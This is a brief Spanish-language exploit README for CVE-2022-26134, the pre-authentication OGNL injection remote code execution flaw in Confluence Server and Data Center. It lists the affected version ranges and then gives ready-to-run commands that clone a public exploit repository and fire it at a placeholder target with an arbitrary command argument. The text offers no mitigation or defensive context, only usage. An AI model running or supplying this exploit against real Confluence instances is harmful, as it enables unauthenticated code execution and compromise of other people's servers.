
「💥」CVE-2022-26134 - Confluence Pre-Auth RCE

En las versiones afectadas de Confluence Server y Data Center, existe una vulnerabilidad de inyección OGNL que permitiría a un atacante no autenticado ejecutar código arbitrario en una instancia de Confluence Server o Data Center. Las versiones afectadas son desde 1.3.0 anteriores a 7.4.17, desde 7.13.0 anteriores a 7.13.7, desde 7.14.0 anteriores a 7.14.3, desde 7.15.0 anteriores a 7.15.2, desde 7.16.0 anteriores a 7.16.4, desde 7.17.0 anteriores a 7.17.4, y desde 7.18.0 anteriores a 7.18.1.


pip install requests
git clone https://github.com/AmoloHT/CVE-2022-26134
cd CVE-2022-26134
python3 cve-2022-26134.py -cmd 'id' -u http://TARGET.TLD